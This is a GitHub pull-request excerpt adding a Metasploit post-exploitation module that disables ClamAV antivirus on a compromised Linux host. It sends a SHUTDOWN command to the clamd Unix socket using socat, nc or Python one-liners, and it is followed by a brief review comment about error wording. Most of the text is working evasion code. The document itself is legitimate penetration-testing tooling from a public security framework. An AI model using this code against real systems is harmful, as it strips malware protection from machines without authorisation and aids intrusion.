modules/post/linux/manage/disable_clamav.rb

```diff
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  Rank = ExcellentRanking
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Disable ClamAV',
+        'Description' => %q{
+          This module will write to the ClamAV Unix socket to shutoff ClamAV.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'DLL_Cool_J'
+        ],
+        'Platform' => [ 'linux' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),
+        OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])
+      ], self.class
+    )
+  end
+
+  def run
+    clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
+    cmd = datastore['COMMAND']
+
+    if command_exists?('socat')
+      print_good('socat exists')
+      payload = "echo #{cmd} | socat - UNIX-CONNECT:#{clamav_socket}"
+    elsif command_exists?('nc')
+      print_good('nc exists')
+      payload = "echo #{cmd} | nc -U #{clamav_socket}"
+    elsif command_exists?('python')
+      print_good('python exists')
+      payload = "python -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""
+    elsif command_exists?('python3')
+      print_good('python3 exists')
+      payload = "python3 -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""
+    else
+      print_bad('Neither socat, nc, python nor python3 exist on the target host. Quitting!')
```

Comment:
```suggestion
      print_bad('No suitable binary found on the target host. Quitting!')
```

Reply:
Thanks Jeffrey! Made this change in [5e2f096](https://github.com/rapid7/metasploit-framework/pull/17672/commits/5e2f0965f3359bcf7396e312bd4f792041382da9) while changing `print_bad` to `fail_with`